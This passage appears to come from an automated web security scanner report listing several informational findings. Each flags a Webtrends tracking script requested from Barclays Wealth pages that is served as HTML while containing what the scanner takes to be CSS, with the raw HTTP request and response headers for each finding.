Cookie: JSESSIONID=6470427122C0BC6EEE06A97043357700; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; _wt.mode-79569=fcdcc722e9320578927c; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05d2312f

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:32 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=9C508F0AF3DD2B4F832C1514175882E4; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d03ba21d2; Expires=Sun, 01-Jan-2012 00:31:33 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=0484ff0a; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e932044d57d7; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.46. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/i-alert.htm?WT.mc_id=int_q3_ialert_bwi&WT.mc_ev=click
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6470427122C0BC6EEE06A97043357700; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; _wt.mode-79569=fcdcc722e93200db2e76

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:32 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.mode-79569=fcdcc722e9320578927c; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05d2312f; Expires=Sun, 01-Jan-2012 00:31:32 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.47. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/brokerage.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1DB1B8506FA734F3D0691621AC32919E; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; _wt.mode-79569=fcdcc722e93202cf02d7

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:10 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=245968D340BB5968593028CAA74B029E; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932033a5f6d; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019; Expires=Sun, 01-Jan-2012 00:02:11 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.48. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2D0CE6DA7B82936A31CBC9ACE233AAA7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e93200beff43; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=699E9E21874BEC698EE100FEE3749834; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932047ca940; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920; Expires=Sun, 01-Jan-2012 00:02:06 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.49. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=366C424481F456C6E4820AE57695F69C; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d01953baa; _wt.mode-79569=fcdcc722e93200feed40

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:12 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=46EC8A693A8B058A0B9D418F6DDAF0B4; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e93201eda062; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200599559; Expires=Sun, 01-Jan-2012 00:02:13 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.50. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4B58DD7DB5603E2D9048FE4EA69A8782; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200599559; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=fcdcc722e9320537bb59

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:15 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.mode-79569=e1f36dbd085f00297bec; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2002e7571; Expires=Sun, 01-Jan-2012 00:02:16 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.51. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-infinite-credit-card.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=DF89E5BAA7A71BDFFD734919F4B8C6D8; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200988e87; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d04610a68; _wt.mode-79569=fcdcc722e93202c8abcc

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:18 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=4274AF1E58216E26E0C3901397ECB67E; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932029c8164; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2008dfa14; Expires=Sun, 01-Jan-2012 00:02:19 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.52. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fc7f16e2bac9d79708c50bf372bb011bcef75d195f4ab356470c9fcda4caf90136b4fd8c4e926d24d97b0eb9dbcb5a8aff45d83f1e109708e3c30731cdc9f3840fc3a7a0143c365b818e56ff1dc73d6ecc56644eb3a56cfdc888e8a74bc251be3275e34e1ac03862018d97dd492c6fc35b877512cc01dae84ce61df7b64626c7de12ae2565ac4fc5a605fb02920dc1052cef7041a76cc8589b7c30b6ba24da6ffa0bce7e2d236b1ed2b395f1db2a0082a0a1c999ccb9c6aab9133844f3c3d9958c5e4314854f6b15d701d9585326708751cc48fdf1b5a803e26b0d56e13c7257372cc1325c653c29f3b3717e9e34211b3242403900c5921a98cca2e47abe547e8625b13a1415786befb2b934520a4215ec71d4e2c0ff47dc1b519a8e2017ff47904709a826a9c20299f424f7d9b26b0f4c35e670a6ae4b7c6b027799946e1f188769cbfea730f796afae58d86aa01603215571dfc0400b0f0257b8b31e1a5ad4b38f105811ecb7b31e865ce6181e8a9fb69ee6345e7c49b6499728042e34fe5ce4729c84af9d01356ff4549842d482bfbf922038533f0af49904931657f6a1cb14afaa9b4effeed499720401fa163132412e7b4d68b365f93bb414881817626cc923cf7712880e14d920714634ee0e278e5c4a5e8ede9a5bf84ed5ea4ef6b081fba12756a17bbcdbeb30934e59109bf55e089e7c0445e608122e93f542fcffe0a416cb0f6f1d9e043afd36d28bf8d6f5d72478aaf920278d837d9ab8108027bf8d0b6d3d7c41e424cca9ea8136b4662f74194271d35f07097594dc8db4303c6594974c428d6516b683c83b675d87720709e1a3cae8fa521584d667c1a3a2297b2344d4bb09b64d8f2991ab4af3a54d9715a3a197f68201a331a797cadf884ea1d113ad78ad1699da6738b218b3d01ed440ad38fdbd44b4b06314deb47d16e4761a9dfb852ffb07d602bc202d39bee704da281510f739c44ceae7858ecff80794041524ee6a7fa76f99e71c06357b71de4c39c7f9f44432a51698ceb2db169e6548f3afd69edc76ffd7722f6e1cda863d30d65eac6c052622667e3f010f064e236d6454ce1af4f28902255f226117fe447834596e93f700700ec0adbd04869f76cf831aa9b0a21776c33a3042a85f734ef4000b93d6a670209691a5bcfb8cb940f0714ed3a23386fd5b7e51a9ae52e2fe054e9eaa

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fc7f16e2bac9d79708c50bf372bb011bcef75d195f4ab356470c9fcda4caf90136b4fd8c4e926d24d97b0eb9dbcb5a8aff45d83f1e109708e3c30731cdc9f3840fc3a7a0143c365b818e56ff1dc73d6ecc56644eb3a56cfdc888e8a74bc251be3275e34e1ac03862018d97dd492c6fc35b877512cc01dae84ce61df7b64626c7de12ae2565ac4fc5a605fb02920dc1052cef7041a76cc8589b7c30b6ba24da6ffa0bce7e2d236b1ed2b395f1db2a0082a0a1c999ccb9c6aab9133844f3c3d9958c5e4314854f6b15d701d9585326708751cc48fdf1b5a803e26b0d56e13c7257372cc1325c653c29f3b3717e9e34211b3242403900c5921a98cca2e47abe547e8625b13a1415786befb2b934520a4215ec71d4e2c0ff47dc1b519a8e2017ff47904709a826a9c20299f424f7d9b26b0f4c35e670a6ae4b7c6b027799946e1f188769cbfea730f796afae58d86aa01603215571dfc0400b0f0257b8b31e1a5ad4b38f105811ecb7b31e865ce6181e8a9fb69ee6345e7c49b6499728042e34fe5ce4729c84af9d01356ff4549842d482bfbf922038533f0af49904931657f6a1cb14afaa9b4effeed499720401fa163132412e7b4d68b365f93bb414881817626cc923cf7712880e14d920714634ee0e278e5c4a5e8ede9a5bf84ed5ea4ef6b081fba12756a17bbcdbeb30934e59109bf55e089e7c0445e608122e93f542fcffe0a416cb0f6f1d9e043afd36d28bf8d6f5d72478aaf920278d837d9ab8108027bf8d0b6d3d7c41e424cca9ea8136b4662f74194271d35f07097594dc8db4303c6594974c428d6516b683c83b675d87720709e1a3cae8fa521584d667c1a3a2297b2344d4bb09b64d8f2991ab4af3a54d9715a3a197f68201a331a797cadf884ea1d113ad78ad1699da6738b218b3d01ed440ad38fdbd44b4b06314deb47d16e4761a9dfb852ffb07d602bc202d39bee704da281510f739c44ceae7858ecff80794041524ee6a7fa76f99e71c06357b71de4c39c7f9f44432a51698ceb2db169e6548f3afd69edc76ffd7722f6e1cda863d30d65eac6c052622667e3f010f064e236d6454ce1af4f28902255f226117fe447834596e93f700700ec0adbd04869f76cf831aa9b0a21776c33a3042a85f734ef4000b93d6a670209691a5bcfb8cb940f0714ed3a23386fd5b7e51a9ae52e2fe054e9eaa

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/debit-cards.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A3D550880A45CA7718800D08622321F7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=e1f36dbd085f00297bec; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2002e7571

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:17 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.mode-79569=e1f36dbd085f0088adcd; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200988e87; Expires=Sun, 01-Jan-2012 00:02:17 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

